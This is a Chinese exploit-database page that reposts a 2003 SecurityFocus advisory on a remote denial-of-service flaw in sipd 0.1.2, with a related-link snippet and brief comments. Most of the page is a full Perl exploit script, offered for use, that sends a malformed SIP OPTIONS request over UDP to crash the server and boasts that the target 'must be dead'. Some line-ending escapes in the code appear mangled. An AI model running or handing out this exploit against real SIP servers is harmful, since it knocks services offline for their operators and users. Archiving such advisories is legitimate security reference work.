SX Design sipd 0.1.2 – Remote Denial of Service
漏洞ID | 1054293 | 漏洞类型 | |
发布时间 | 2003-12-11 | 更新时间 | 2003-12-11 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Multiple | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/9198/info
It has been reported that sipd may be prone to a vulnerability that may allow a remote attacker to cause a denial of service condition in the software. The problem is reported to exist in the gethostbyname_r function. An attacker may be able to cause the server to crash by sending a malformed SIP request.
sipd version 0.1.2 has been reported to be prone to this issue, however other versions could be affected as well.
#!/usr/bin/perl
# SIPd - SIP URI Denial of Service
# Kills sipd version 0.1.2
use IO::Socket;
use strict;
unless (@ARGV == 2) { die "usage: $0 host your_ip [port]" }
my $remote_host = shift(@ARGV);
my $your_host = shift(@ARGV);
my $port = shift(@ARGV);
if ($port eq "")
{
$port = "5060";
}
my $buf = "OPTIONS sip:A$remote_host SIP/2.0r
Via: SIP/2.0/UDP $your_host:3277r
From: <sip:$your_host:3277>r
To: <sip:$your_host:3277>r
Call-ID: 12312312@$your_hostr
CSeq: 1 OPTIONSr
Max-Forwards: 70r
rn";
my $socket = IO::Socket::INET->new(Proto => "udp") or die "Socket error:
$@n"; my $ipaddr = inet_aton($remote_host) || $remote_host; my $portaddr
= sockaddr_in($port, $ipaddr);
send($socket, $buf, 0, $portaddr) == length($buf) or die "Can't send:
$!n";
print "Now, '$remote_host' must be dead :)n";
相关推荐: vBulletin private.php跨站脚本攻击漏洞
vBulletin private.php跨站脚本攻击漏洞 漏洞ID 1107326 漏洞类型 跨站脚本 发布时间 2003-05-14 更新时间 2003-06-16 CVE编号 CVE-2003-0295 CNNVD-ID CNNVD-200306-086…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666